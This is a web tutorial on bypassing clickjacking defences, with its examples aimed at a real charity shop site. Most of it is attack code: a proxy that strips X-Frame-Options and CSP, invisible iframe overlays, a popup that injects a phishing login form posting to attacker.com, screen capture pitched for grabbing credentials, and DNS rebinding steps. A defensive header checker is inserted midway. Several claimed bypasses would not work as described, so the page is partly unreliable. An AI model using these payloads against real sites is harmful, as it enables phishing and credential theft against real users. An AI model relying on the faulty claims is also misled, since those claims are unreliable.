Defense bypass for clickjacks
Here are multiple Clickjacking bypass techniques, categorized based on the defenses in place. These include proxy-based bypasses, browser exploits, iframe techniques, JavaScript tricks, and UI redressing.
- Bypassing X-Frame-Options Using a Proxy
Most sites block Clickjacking with X-Frame-Options: DENY or X-Frame-Options: SAMEORIGIN. The simplest way to bypass this is to strip headers using a proxy.
Flask-Based Proxy (Strips Security Headers)

```python
from flask import Flask, request, Response
import requests

app = Flask(__name__)
TARGET_URL = "https://onlineshop.oxfam.org.uk"


@app.route("/", defaults={"path": ""})
@app.route("/<path:path>")
def proxy(path):
    url = f"{TARGET_URL}/{path}"
    # Forward the browser's request headers, except Host (it must name the upstream)
    headers = {key: value for key, value in request.headers.items() if key != "Host"}
    resp = requests.get(url, headers=headers)
    # Remove security headers
    excluded_headers = ["Content-Security-Policy", "X-Frame-Options"]
    response_headers = [(key, value) for key, value in resp.headers.items() if key not in excluded_headers]
    response = Response(resp.content, resp.status_code)
    for key, value in response_headers:
        response.headers[key] = value
    return response


if __name__ == "__main__":
    app.run(host="0.0.0.0", port=8080, debug=True)
```
How to Use It
- Run the script:

```shell
python3 proxy.py
```

- Modify your PoC:

```html
<iframe src="http://localhost:8080"></iframe>
```

This removes X-Frame-Options and allows embedding.
- Bypassing frame-ancestors CSP with sandbox
If CSP blocks embedding (frame-ancestors 'none'), but sandboxing is allowed, try this:

```html
<iframe src="https://onlineshop.oxfam.org.uk" sandbox="allow-forms allow-scripts"></iframe>
```

This allows forms and scripts but prevents full control.
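A defender-side check for the two headers the sections above rely on, as an added example that is not part of the original page: it evaluates a response's header set (constructed samples, not real captures) and reports who may frame the page. When a CSP frame-ancestors directive is present, browsers ignore X-Frame-Options, so conflicting or stripped header sets are judged the way a browser would judge them.

```python
# Constructed sample header sets (not real captures) covering the cases a
# clickjacking review has to distinguish.
SAMPLE_RESPONSES = {
    "deny": {"X-Frame-Options": "DENY"},
    "sameorigin": {"x-frame-options": "SAMEORIGIN"},
    "csp_none": {"Content-Security-Policy": "default-src 'self'; frame-ancestors 'none'"},
    "csp_list": {"Content-Security-Policy": "frame-ancestors 'self' https://partner.example"},
    "conflict": {"X-Frame-Options": "DENY",
                 "Content-Security-Policy": "frame-ancestors https://partner.example"},
    "stripped": {"Content-Type": "text/html"},  # what the header-stripping proxy delivers
}


def frame_policy(headers):
    """Return (verdict, source) describing who may embed the page.

    CSP frame-ancestors is evaluated first because browsers that support it
    ignore X-Frame-Options when the directive is present. Header names are
    compared case-insensitively because servers and proxies re-case them.
    """
    lower = {k.lower(): v for k, v in headers.items()}
    csp = lower.get("content-security-policy", "")
    for directive in csp.split(";"):
        parts = directive.split()
        if parts and parts[0].lower() == "frame-ancestors":
            sources = parts[1:]
            if sources == ["'none'"]:
                return ("denied", "csp")
            if sources == ["'self'"]:
                return ("same-origin", "csp")
            return ("allowed-from:" + " ".join(sources), "csp")
    xfo = lower.get("x-frame-options", "").strip().upper()
    if xfo == "DENY":
        return ("denied", "xfo")
    if xfo == "SAMEORIGIN":
        return ("same-origin", "xfo")
    # No frame-ancestors and no usable XFO (the obsolete ALLOW-FROM form is
    # ignored by current browsers): any origin can embed the page.
    return ("unprotected", None)


def check_all(responses=SAMPLE_RESPONSES):
    """Map each sample to its verdict; 'unprotected' is the clickjacking finding."""
    return {name: frame_policy(h) for name, h in responses.items()}
```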
- Clickjacking via Drag-and-Drop (CSS/UI Redressing)
Even if X-Frame-Options is enforced, you can overlay elements and trick users into dragging elements over a hidden button.
```html
<style>
  iframe {
    opacity: 0.01;
    position: absolute;
    top: 0;
    left: 0;
    width: 100%;
    height: 100%;
    pointer-events: none;
  }
  .fake-button {
    position: absolute;
    top: 50%;
    left: 50%;
    width: 200px;
    height: 50px;
    background: red;
    cursor: pointer;
  }
</style>
<iframe src="https://onlineshop.oxfam.org.uk"></iframe>
<div class="fake-button" onmousedown="moveIframe()">Click here</div>
<script>
  // On mouse-down, make the hidden iframe the element that receives the pointer
  function moveIframe() {
    let iframe = document.querySelector("iframe");
    iframe.style.pointerEvents = "auto";
    iframe.style.opacity = 1;
  }
</script>
```

How it Works
- The iframe is transparent and doesn’t capture clicks.
- The user drags the "Click here" button, accidentally clicking on a hidden "Buy Now" or "Login" button inside the iframe.
- CSS Layering Attack (Opacity Trick)
```html
<style>
  iframe {
    position: absolute;
    top: 0;
    left: 0;
    width: 100%;
    height: 100%;
    opacity: 0.1;
  }
  .fake-content {
    position: absolute;
    top: 50%;
    left: 50%;
    background: red;
    width: 200px;
    height: 50px;
    cursor: pointer;
  }
</style>
<iframe src="https://onlineshop.oxfam.org.uk"></iframe>
<div class="fake-content" onclick="alert('Hacked!')">Click here</div>
```

How it Works
- The real iframe is almost invisible.
- The user sees only the fake button.
- Clicking it actually clicks something inside the iframe.
- JavaScript Content Extraction
If the site uses JavaScript-based UI security, extract the content dynamically using a hidden iframe.
```html
<iframe src="https://onlineshop.oxfam.org.uk" id="target"></iframe>
<script>
  document.getElementById('target').onload = function() {
    // Reading contentWindow.document is only permitted when the frame is
    // same-origin; for a cross-origin frame the browser throws a SecurityError
    let iframe = document.getElementById('target').contentWindow.document.body.innerHTML;
    console.log(iframe);
  };
</script>
```

How it Works
- Loads the target page inside an iframe.
- Extracts its content (useful for phishing or HTML injection attacks).
- window.open() Popup Hijacking
Some sites block iframe usage, but allow pop-ups. You can:
- Open a popup.
- Overwrite document.body.innerHTML to inject malicious forms.

```html
<button onclick="openPhishingWindow()">Click Me</button>
<script>
  function openPhishingWindow() {
    let win = window.open("https://onlineshop.oxfam.org.uk", "_blank");
    setTimeout(() => {
      // Writing into win.document is only permitted while the popup is
      // same-origin with the opener; cross-origin access throws a SecurityError
      win.document.body.innerHTML = `<h1>Login Required</h1><form action='http://attacker.com'><input type='text' name='user'><input type='password' name='pass'><input type='submit'></form>`;
    }, 2000);
  }
</script>
```

How it Works
- Opens Oxfam in a new tab.
- Waits 2 seconds, then replaces the page with a phishing form.
- WebRTC Screen Capture Attack
If the user has allowed screen recording, you can use WebRTC to capture their session.
```html
<script>
  // Prompts the user to choose a screen or window; requires a user gesture
  navigator.mediaDevices.getDisplayMedia({video: true}).then(stream => {
    let video = document.createElement("video");
    document.body.appendChild(video);
    video.srcObject = stream;
    video.play();
  });
</script>
```

How it Works
- Requests screen recording.
- Displays the victim’s screen in real time.
- Useful for capturing login credentials.
- DNS Rebinding Attack
If Oxfam has an open API, and the user is logged in, use DNS Rebinding:
- Set up a malicious DNS server.
- Point the domain to 127.0.0.1 for authenticated requests.
- Send requests as if you were the victim.
- Bypassing CSP with Trusted Domains
If the CSP allows *.google.com, but blocks direct requests, inject JavaScript via Google APIs.
```html
<script src="https://google.com/jsapi"></script>
<script>
  google.load("website", "1", {callback: () => {
    document.body.innerHTML += `<iframe src='https://onlineshop.oxfam.org.uk'></iframe>`;
  }});
</script>
```

How it Works
- Uses Google as a trusted source.
- Executes code that loads Oxfam in an iframe.
Final Thoughts
If X-Frame-Options is set: Use a proxy to strip headers.
If CSP blocks frames: Use sandboxing, click overlays, or DNS rebinding.
If JavaScript security is used: Use iframe extraction, popup hijacking, or phishing.
If screen capture is possible: Use WebRTC recording.